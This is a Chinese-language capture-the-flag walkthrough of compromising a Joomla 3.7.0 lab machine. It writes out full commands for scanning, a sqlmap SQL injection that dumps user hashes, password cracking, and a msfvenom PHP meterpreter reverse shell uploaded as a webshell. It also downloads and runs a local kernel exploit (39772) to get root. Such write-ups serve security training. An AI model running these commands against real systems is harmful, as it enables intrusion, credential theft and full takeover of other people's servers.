靶机地址
一.进行信息收集
1.使用nmap扫描,进行主机发现
nmap -sn 192.168.25.0/24
使用nmap扫描之后发现ip地址为:192.168.25.148
2.使用nmap进行端口扫描
nmap -p 1-65535 -T4 -A -v 192.168.25.148
发现其开启了80端口
3.使用小工具收集web指纹信息
这里可以发现其CMS为joomla,web服务器为apache2.4.18
4.访问192.168.25.148
5. 扫描敏感目录
dirsearch -u "http://192.168.25.148/"
1.发现了登录相关的目录
2.访问这个目录,出现了登录框
3.我这里想的是,由于是一个joomla的cms系统,可以尝试使用cewl拉取一个密码字典,然后使用burpsuite进行用户名密码爆破,没有成功
二.漏洞扫描
1.使用joomla的专用扫描器joomscan扫描,只发现了版本号
joomscan -u 192.168.25.148
2.使用nmap的漏洞库扫描存在的漏洞
nmap --script=vuln -p80 192.168.25.148
存在joomla 3.7.0存在一个sql注入漏洞
3.这里也可以使用searchsploit
searchsploit joomla 3.7.0
1 .同样找到了joomla 3.7.0 的sql注入漏洞以及它的利用方法
2.找到这个漏洞的利用方法,可以使用searchsploit查找
searchsploit -p 42033
3.打开这个txt文件,里面有使用sqlmap的利用方法
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
三.漏洞利用
1.使用sqlmap获取数据
sudo sqlmap -u "http://<这里是靶机ip>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3
--level=5 --random-agent --dbs -p list[fullordering]
1.获取数据库名称
2.获取数据表,发现了一张"#__users"表
sudo sqlmap -u "http://192.168.25.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
3.拉取字段
sudo sqlmap -u "http://192.168.25.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" --columns -p list[fullordering] --dump
4.将密码复制保存到一个txt文件中
5.使用john解密
john joomla.txt
2.使用账户密码登录
1.浏览过程中发现这里可以上传文件,可以尝试上传木马
2.使用msfvenom模块生成一个木马文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.23.11.188 LPORT=4444 -f raw > shell.php
3.将生成的文件上传,如果不能成功上传,就直接创建文件,将木马内容复制
4.启动msf,使用exploit/multi/handler侦听4444端口,设置payload和ip
5.上传的木马文件应当在这个目录下:
6.访问这个目录下的文件,msf中成功上线
四.权限提升
1.进入shell,使用python的pty模块反弹shell
python -c "import pty;pty.spawn('/bin/sh')";
2.这里使用sudo提权和uid提权都不行
3.尝试使用内核提权
1.查看内核版本,百度一下,Ubuntu版本为Ununtu16.04
2.使用searchsploit查找漏送利用方式
searchsploit Ubuntu 16.04
3.查看漏洞利用方式
searchsploit -p 39772
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
4.这里提示这个脚本运行这两个命令就能提升权限
4.去有执行权限的tmp目录下拉取脚本
1.拉取脚本
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
2.解压39772.zip,并进入
unzip 39772.zip
3.解压exploit.tar,并进入
tar -xvf exploit.tar
4.执行命令,获取权限
./compile.sh
./doubleput
5.去root目录下查看最终发flag